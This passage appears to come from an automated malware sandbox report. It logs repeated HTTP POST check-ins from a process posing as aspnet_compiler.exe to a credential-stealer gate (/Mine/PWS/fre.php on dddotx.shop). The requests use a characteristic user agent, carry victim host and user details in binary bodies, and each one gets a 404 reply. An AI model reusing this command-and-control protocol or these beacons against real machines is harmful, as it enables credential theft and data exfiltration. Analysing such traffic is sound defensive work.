                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7H0voRf4Ea7ANWxnKVc9K4%2FXsB8L8JWatlt%2BTGsZvO42aH2necDqzlj6iAd%2F3fv4umbdItfK2jRLKxN6N70OER6sL9ExURXSEQevKmS4aW2GeKzd0lKyiPXXknDixw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c6b1f0742dc-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.455906188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:04.908715010 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:04.914671898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:05.574727058 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxwbX%2FW%2FSD9KTpSDTVKvqkGZEEloWbfvEP4FdC9czI5fbe4SoAcZjim5TGUJzEBOmwDkVmsbg9CNkGFjLRb01vVxuCcXyzKHd%2BXXHGvRbA87Q5a148kkJ3RO3lX3KQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c702b3d4299-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.455907188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:05.718041897 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:05.723093033 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:06.426374912 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIaVLwL3fCDsNslpZyd8seavraM6aeYYT%2FZReyDml5LIXtJupZzOSQZPXNeL0aos34PBBHIpEPeXvwWeBmJahdtyiVkwsstiXA81Ro%2BGOhO2p8P%2B2ZgAg8tf5bY3Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c753f0d72a1-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.455908188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:06.582248926 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:06.587970972 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:07.270327091 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nG%2BHNvFNULyT4%2FWAOFCzIX4eFuLkMqg88C6OhEEyWIZh6vYLNNcRncuI4bx0Zf7XAN5E2FI6Leomfwm3j74aD6sUDivQ7TGDpuCiNVQIWfhjMPznHtSg4Qw2FsMhcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c7abcef0f9f-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.455909188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:07.444246054 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:07.449996948 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:08.155661106 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFDPp5lu4YV2W6dMQAd%2B2ShykyGScHmyYuiTtqTIYAT1Y8tD4RvOLUNr4cmwACWt1GsmjtpAgaArCc1JF8gWlqKVzAR9ou0rxSzxTMPcGhE0eNbpob%2FfEjE7umTbNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c801d30c32d-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.455910188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:08.314676046 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:08.319577932 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:09.003256083 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVO%2F5A8JAU9qQZcaVERm1%2BEgkkCK5hujTQWyYMbZ4oOPVyyCdzBFkA7EHUqEpTu5Zx%2BSea8pJHtLZ2e2grtdKQ%2B5s3oss4ew%2Bli4%2BEoA1DZUMzZZVmsEjVFwY5o3vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c8578edc41d-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.455911188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:09.174232006 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:09.181025982 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:09.872705936 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LU4VHpSzuRNjh8ksC51UaT0dS2iyoIu1dBWDF97muLVazraUNDK5b31qRII4Gw6uoQFkTWNGwTbbVT4AxD1%2FZusqGf1pmy4BlVV9AOLTQGnWoiRu%2BCANEuHK5mvDYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c8b0dde0c88-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.455912188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:10.034786940 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:10.039622068 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:10.728037119 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5areRQ8RVW6i6Kx6nB6uSw5wKrsFsOgbT0dL7Mfu4Q2hhnTp836gcPsrU82P0%2FHooIINORbheluJd75JC%2F%2B9l3XpDYnOjrRBqwYxXvXyZnfhOJXcYnPLvml34hu3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c9058956a56-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.455913188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:10.887372971 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:10.892410040 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:11.581698895 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2BBwQmk6VYBP02j2IOZyhBsJqsFAomMn57IGmAw4OlCPmVL8%2FNIABK3M59fGdrktaeHydS5Ew5Ya5Af3WHq%2FK8Qyoxq7Gm572XC8Y8nhUR6aPZdH%2BQ0Hy3ZlPbTQuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c95afc141ba-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.455914188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:11.748871088 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:11.755446911 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:12.445864916 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMM1Rkn41hTZYUJPHhUBND%2BJW7hWiAF%2BAlEbpcMcgSa8Vid9%2FbfJljfxwGlNCgHPymwigeeCcuny5oQLco%2FgLmg0kKGbXbKQC4JYQgEZfuPVAxJ5osBaAXIHUm%2B7Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c9b09644334-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.455915188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:12.603019953 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:12.608011007 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:13.328320026 CEST561INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3VqhxYLrrdmvgSdAClARJFzkNwAILHaHWhTqdbWqRChvC8LlsaHa3DMDi1JWkTfMdZCJCB0uWALHoG2caS0vo0Y9uX04bMK2SzEiu1CQ2m5GlZLlZalasbUS3tgNSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ca04f4d72ab-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.455916188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:13.482163906 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:13.487014055 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:14.283534050 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5sOSwaj8fiRlIM0KxBG9%2FihxdXciMHWHYqrZl3lpO6Tw2MQ2PrOUgUY2dS%2FuXYUUH90chAAokGnLtgULc8BeCim9iViGhawgLfCKJHMYiToVkI3XWEK%2BdhxDnvJ9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ca60be40f80-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.455917188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:14.452272892 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:14.457361937 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:15.163403988 CEST597INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FjTa9SGbqI7tRrMn1jg7fOzn0AC9BrGKXpijpand7O4aqZEcn9M0RT%2BHbujCgl182XHxUIUa8CCz7q8OPzVMiNnWY5GjByE2gBIff5dTkiFb5vBQ5xs%2FctcX5YCU8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cabe8ff728a-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.455918188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:15.339183092 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:15.345683098 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:16.082158089 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2Blj5W9CMb7bYuc1WgWZrzJzhoba8cGZTChAW5Sf4pmJjePQ1jFkvsB5XLLCF959uNkilwnITpVWR0urSeOJkB3rT36Z7t%2BewpUR2lXPCKcgwzvX9SWtje50TmiyTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cb169384294-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.455919188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:16.352869034 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:16.357806921 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:17.069355011 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AjVi%2BJY08PU2qF6z7Fp3wKYVLkB5w0UjSjkmgA9EiMMNLuTuQ1U6VJK3iWgb6K1UZoaeWbqb%2Ba9DmXwcyMq2YApCmUNBkf%2FQYkibzYpcV7P3qTMvpU0QVxTVr9aD%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cb7bdda8c21-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.455920188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:17.224992037 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
